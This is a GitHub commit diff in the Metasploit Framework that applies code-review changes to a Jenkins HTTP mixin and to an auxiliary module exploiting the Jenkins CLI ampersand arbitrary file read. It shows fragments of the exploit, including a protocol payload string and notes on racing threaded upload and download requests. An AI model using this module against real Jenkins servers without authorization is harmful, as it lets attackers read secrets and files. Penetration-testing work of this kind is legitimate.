Skip to content

Commit 14938a2

Browse files
authored
Apply suggestions from code review
1 parent 1e6cf52 commit 14938a2

File tree

2 files changed

+6
-4
lines changed

2 files changed

+6
-4
lines changed

lib/msf/core/exploit/remote/http/jenkins.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ def jenkins_version
1515
res = send_request_cgi({ 'uri' => uri })
1616

1717
unless res
18-
fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
18+
return nil
1919
end
2020

2121
# shortcut for new versions such as 2.426.2 and 2.440

modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,8 @@
66
class MetasploitModule < Msf::Auxiliary
77
include Msf::Auxiliary::Report
88
include Msf::Exploit::Remote::HttpClient
9+
include Msf::Exploit::Remote::HTTP::Jenkins
10+
prepend Msf::Exploit::Remote::AutoCheck
911

1012
def initialize(info = {})
1113
super(
@@ -128,7 +130,7 @@ def parameter_one
128130
"\x03\x00\x00\x01\x31\x00\x00\x00"
129131
end
130132

131-
def data_generator(pad: false)
133+
def data_generator(pad = false)
132134
data = []
133135
data << request_header
134136
data << parameter_one if pad
@@ -141,7 +143,7 @@ def data_generator(pad: false)
141143
data.join('')
142144
end
143145

144-
def upload_request(uuid, multi_line_file: true)
146+
def upload_request(uuid, multi_line_file = true)
145147
# send upload request asking for file
146148

147149
# In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request
@@ -231,7 +233,7 @@ def run
231233
# Looking over the python PoCs, they all include threading however
232234
# the writeup, and PoCs don't mention a timing component.
233235
# However, during testing it was found that the two requests need to
234-
# his the server nearly simultaneously, with the 'download' one hitting
236+
# hit the server nearly simultaneously, with the 'download' one hitting
235237
# first. During testing, even a .1 second slowdown was too much and
236238
# the server resulted in a 500 error. So we need to thread these to
237239
# execute them fast enough that the server gets both in rapid succession

0 commit comments

Comments
 (0)